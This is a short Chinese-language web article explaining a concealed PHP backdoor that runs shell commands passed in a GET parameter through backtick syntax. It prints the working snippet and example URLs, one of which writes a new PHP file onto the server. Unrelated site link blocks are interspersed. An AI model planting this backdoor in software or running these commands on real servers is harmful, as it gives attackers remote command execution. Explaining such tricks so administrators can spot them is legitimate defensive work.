一个不易被发现的PHP后门代码解析

　　本文标签：PHP,后门,代码

偶然间看到一段，看起来似乎没有什么问题，确是能致命的后门代码，这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ，反撇号包含的字符串，等同于shell_exec函数。

伪装性很好，很容易被管理员忽略。

$selfNums = $_GET[r];
if (isset($selfNums)){
  echo `$selfNums`;
}

刚看到这段代码我想大家都会说没有问题，但是细心的朋友也会发现下面的变量被一个符号包起来了，既然是变量为什么要这样了，

学会“白加黑减” 掌握照片曝光准确的秘密	消息称米哈游两度试图绕开30%“苹果抽成税” 试图获得更多利润
基础知识：镜头“等效焦距”是什么，与“焦距”怎么区分？	照片歪斜、变形怎么办？分享3种好用的校正方法

而且又不是单引号，这个就是关键所在了，这个符号是 Esc 下面的一个键（位于感叹号！旁边的），

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php

“元宇宙”火了，VR新风口来了吗？	微信显示对方正在输入, 你以为正在给你回复，其实并不是
手机NFC自带4个功能个个都实用内行人：不会用就别买	高画质全能表现全画幅微单相机选购攻略

我用 appserv 和虚拟主机已经测试成功。

技术文章快速查找

相关下载

在线教程导航